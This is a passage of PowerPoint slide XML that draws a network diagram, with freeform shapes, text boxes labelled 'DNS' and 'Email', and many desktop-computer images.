                <a:gd name="T1" fmla="*/ 103 h 103"/>
                <a:gd name="T2" fmla="*/ 0 w 278"/>
                <a:gd name="T3" fmla="*/ 66 h 103"/>
                <a:gd name="T4" fmla="*/ 90 w 278"/>
                <a:gd name="T5" fmla="*/ 0 h 103"/>
                <a:gd name="T6" fmla="*/ 278 w 278"/>
                <a:gd name="T7" fmla="*/ 37 h 103"/>
                <a:gd name="T8" fmla="*/ 192 w 278"/>
                <a:gd name="T9" fmla="*/ 103 h 103"/>
                <a:gd name="T10" fmla="*/ 192 w 278"/>
                <a:gd name="T11" fmla="*/ 103 h 103"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 278"/>
                <a:gd name="T19" fmla="*/ 0 h 103"/>
                <a:gd name="T20" fmla="*/ 278 w 27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78" h="103">
                  <a:moveTo>
                    <a:pt x="192" y="103"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="103"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CCDE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99" name="Freeform 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE066FCC-6133-4EA9-B7DE-050C7B1FF51E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="21" y="86"/>
              <a:ext cx="147" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 147 w 147"/>
                <a:gd name="T1" fmla="*/ 29 h 62"/>
                <a:gd name="T2" fmla="*/ 0 w 147"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 147"/>
                <a:gd name="T5" fmla="*/ 33 h 62"/>
                <a:gd name="T6" fmla="*/ 147 w 147"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 147 w 147"/>
                <a:gd name="T9" fmla="*/ 29 h 62"/>
                <a:gd name="T10" fmla="*/ 147 w 147"/>
                <a:gd name="T11" fmla="*/ 29 h 62"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 147"/>
                <a:gd name="T19" fmla="*/ 0 h 62"/>
                <a:gd name="T20" fmla="*/ 147 w 147"/>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47" h="62">
                  <a:moveTo>
                    <a:pt x="147" y="29"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="2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400" name="Freeform 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{595A3CE8-86FA-4DFD-90E7-580160DF22C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="54" y="123"/>
              <a:ext cx="192" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 192"/>
                <a:gd name="T1" fmla="*/ 176 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 192"/>
                <a:gd name="T3" fmla="*/ 209 h 209"/>
                <a:gd name="T4" fmla="*/ 159 w 192"/>
                <a:gd name="T5" fmla="*/ 193 h 209"/>
                <a:gd name="T6" fmla="*/ 159 w 192"/>
                <a:gd name="T7" fmla="*/ 21 h 209"/>
                <a:gd name="T8" fmla="*/ 192 w 192"/>
                <a:gd name="T9" fmla="*/ 0 h 209"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 192"/>
                <a:gd name="T16" fmla="*/ 0 h 209"/>
                <a:gd name="T17" fmla="*/ 192 w 192"/>
                <a:gd name="T18" fmla="*/ 209 h 209"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="192" h="209">
                  <a:moveTo>
                    <a:pt x="0" y="176"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="134" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192"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401" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{156D24BD-73B5-4D85-981E-E8B3F6C63317}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="237" y="111"/>
              <a:ext cx="29" cy="28"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 29"/>
                <a:gd name="T1" fmla="*/ 12 h 28"/>
                <a:gd name="T2" fmla="*/ 4 w 29"/>
                <a:gd name="T3" fmla="*/ 4 h 28"/>
                <a:gd name="T4" fmla="*/ 17 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 25 w 29"/>
                <a:gd name="T7" fmla="*/ 4 h 28"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 12 h 28"/>
                <a:gd name="T10" fmla="*/ 25 w 29"/>
                <a:gd name="T11" fmla="*/ 24 h 28"/>
                <a:gd name="T12" fmla="*/ 17 w 29"/>
                <a:gd name="T13" fmla="*/ 28 h 28"/>
                <a:gd name="T14" fmla="*/ 4 w 29"/>
                <a:gd name="T15" fmla="*/ 24 h 28"/>
                <a:gd name="T16" fmla="*/ 0 w 29"/>
                <a:gd name="T17" fmla="*/ 12 h 28"/>
                <a:gd name="T18" fmla="*/ 0 w 29"/>
                <a:gd name="T19" fmla="*/ 1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12"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="24"/>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402" name="Freeform 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF2A31DC-065E-4D07-AF47-DDB62BDF54D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="241" y="172"/>
              <a:ext cx="29" cy="29"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 29"/>
                <a:gd name="T1" fmla="*/ 17 h 29"/>
                <a:gd name="T2" fmla="*/ 5 w 29"/>
                <a:gd name="T3" fmla="*/ 4 h 29"/>
                <a:gd name="T4" fmla="*/ 17 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 29"/>
                <a:gd name="T6" fmla="*/ 25 w 29"/>
                <a:gd name="T7" fmla="*/ 4 h 29"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 17 h 29"/>
                <a:gd name="T10" fmla="*/ 25 w 29"/>
                <a:gd name="T11" fmla="*/ 25 h 29"/>
                <a:gd name="T12" fmla="*/ 17 w 29"/>
                <a:gd name="T13" fmla="*/ 29 h 29"/>
                <a:gd name="T14" fmla="*/ 5 w 29"/>
                <a:gd name="T15" fmla="*/ 25 h 29"/>
                <a:gd name="T16" fmla="*/ 0 w 29"/>
                <a:gd name="T17" fmla="*/ 17 h 29"/>
                <a:gd name="T18" fmla="*/ 0 w 29"/>
                <a:gd name="T19" fmla="*/ 1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17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5"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403" name="Freeform 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52BC9F88-98E6-465E-B91E-0AAE822DBB58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="54" y="180"/>
              <a:ext cx="200" cy="209"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 200"/>
                <a:gd name="T1" fmla="*/ 181 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 200"/>
                <a:gd name="T3" fmla="*/ 209 h 209"/>
                <a:gd name="T4" fmla="*/ 200 w 200"/>
                <a:gd name="T5" fmla="*/ 168 h 209"/>
                <a:gd name="T6" fmla="*/ 200 w 200"/>
                <a:gd name="T7" fmla="*/ 0 h 209"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 60000 65536"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 0 h 209"/>
                <a:gd name="T14" fmla="*/ 200 w 200"/>
                <a:gd name="T15" fmla="*/ 209 h 209"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T8">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T9">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T10">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T12" t="T13" r="T14" b="T15"/>
              <a:pathLst>
                <a:path w="200" h="209">
                  <a:moveTo>
                    <a:pt x="0" y="181"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="134" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200"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404" name="Freeform 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BB569C-8EE2-4F08-AED2-B4426A6509D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="37" y="344"/>
              <a:ext cx="33" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 33"/>
                <a:gd name="T1" fmla="*/ 17 h 33"/>
                <a:gd name="T2" fmla="*/ 4 w 33"/>
                <a:gd name="T3" fmla="*/ 4 h 33"/>
                <a:gd name="T4" fmla="*/ 17 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 33"/>
                <a:gd name="T6" fmla="*/ 29 w 33"/>
                <a:gd name="T7" fmla="*/ 4 h 33"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 17 h 33"/>
                <a:gd name="T10" fmla="*/ 29 w 33"/>
                <a:gd name="T11" fmla="*/ 29 h 33"/>
                <a:gd name="T12" fmla="*/ 17 w 33"/>
                <a:gd name="T13" fmla="*/ 33 h 33"/>
                <a:gd name="T14" fmla="*/ 4 w 33"/>
                <a:gd name="T15" fmla="*/ 29 h 33"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 17 h 33"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>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17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="29"/>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405" name="Freeform 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF9475B-1D89-4E63-9E9C-2EABEE1C9B6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="37" y="283"/>
              <a:ext cx="33" cy="37"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 33"/>
                <a:gd name="T1" fmla="*/ 20 h 37"/>
                <a:gd name="T2" fmla="*/ 4 w 33"/>
                <a:gd name="T3" fmla="*/ 4 h 37"/>
                <a:gd name="T4" fmla="*/ 17 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 37"/>
                <a:gd name="T6" fmla="*/ 29 w 33"/>
                <a:gd name="T7" fmla="*/ 4 h 37"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 20 h 37"/>
                <a:gd name="T10" fmla="*/ 29 w 33"/>
                <a:gd name="T11" fmla="*/ 33 h 37"/>
                <a:gd name="T12" fmla="*/ 17 w 33"/>
                <a:gd name="T13" fmla="*/ 37 h 37"/>
                <a:gd name="T14" fmla="*/ 4 w 33"/>
                <a:gd name="T15" fmla="*/ 33 h 37"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 20 h 37"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>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7"/>
                <a:gd name="T32" fmla="*/ 33 w 33"/>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7">
                  <a:moveTo>
                    <a:pt x="0" y="20"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="20"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="33"/>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84329" name="Text Box 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184AF909-5504-4695-8AB1-909625428F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="5943600"/>
            <a:ext cx="693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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184330" name="Text Box 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{809FACB1-0147-4DF0-93AB-B556BEA9E141}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3725863" y="5943600"/>
            <a:ext cx="693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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184331" name="Picture 23" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B64DA2A8-90D4-4CB0-83BA-740EAAB8CA31}"/>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2200" y="2492375"/>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2" name="Picture 24" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325E854C-C0F1-4E92-BE75-1062D2A3565F}"/>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2492375"/>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3" name="Picture 25" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F36B1A1D-211E-4716-8A27-A1C57018D4A5}"/>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2200" y="2165350"/>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4" name="Picture 26" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AE0582C-A64C-4659-BBF3-BAED7F9A3265}"/>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2165350"/>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5" name="Picture 27" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FD858E0-3A1E-4DFA-8DB5-3EF0678F3065}"/>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3" y="1774825"/>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6" name="Picture 28" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48256B31-8FAB-4FB0-91FF-A1FEA4B8F40E}"/>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2613" y="1774825"/>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7" name="Picture 29" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA7CD1D-1B01-4BDC-88CA-AD1F0C4A795A}"/>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7813" y="1447800"/>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8" name="Picture 30" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{637E2E2C-C1AD-4641-8FFD-3F881177FC94}"/>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2613" y="1447800"/>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9" name="Picture 31" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9FE148-B2D2-4C72-B56C-54ADCB7651EF}"/>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6813" y="1927225"/>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0" name="Picture 32" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B714FF9-50C3-4734-BF84-E333F99E9225}"/>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1613" y="1927225"/>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1" name="Picture 33" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2519C2A1-188D-4A3B-BCA6-85C793858FD9}"/>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6813" y="1600200"/>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2" name="Picture 34" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E90A67-80FA-4ED6-9AC9-26EB90E0CA0B}"/>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1613" y="1600200"/>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3" name="Picture 35" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4A966D-752A-4B22-8ADD-FD23066EDFB7}"/>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400" y="1501775"/>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4" name="Picture 36" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE9EFAAE-3FA6-42BC-967E-1B7FE28F93B4}"/>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1501775"/>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5" name="Picture 37" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFC0FBFD-2478-4FFE-8064-F71B60478718}"/>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7400" y="1174750"/>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6" name="Picture 38" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35922255-6D43-45C0-9BF3-B10B212A5DA2}"/>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1174750"/>
            <a:ext cx="261938"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7" name="Picture 39" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{517D3778-2383-4712-A5BB-A8658024D56C}"/>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213" y="6248400"/>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8" name="Picture 40" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{494685C9-136F-4FD6-8363-F8FD087C8443}"/>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3013" y="6248400"/>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49" name="Picture 41" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39D4565E-9449-46E9-B22D-4291B64BBF7D}"/>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8213" y="5921375"/>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0" name="Picture 42" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46045E14-DC7A-43AC-AB19-67579BAD207B}"/>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3013" y="5921375"/>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1" name="Picture 43" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0011331C-AAE1-44FE-AA30-C26386592126}"/>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13" y="5614988"/>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2" name="Picture 44" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACE43C19-FF1E-41C2-896D-08D88D221E7D}"/>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013" y="5614988"/>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3" name="Picture 45" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED2F7395-1FF6-40E0-9061-2813B9E4E8F1}"/>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13" y="5287963"/>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4" name="Picture 46" descr="desktop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A8D043-FBCE-4D9F-AD13-954EA3DC967F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0">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013" y="5287963"/>
            <a:ext cx="2619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67" name="Group 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBA699C0-94BC-4C24-8330-23D5CDB957CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1176338"/>
            <a:ext cx="8839200" cy="5387975"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5568" cy="3394"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="184370" name="Text Box 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFAC82DF-0DA5-4EF6-926D-4F3B689FB2DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
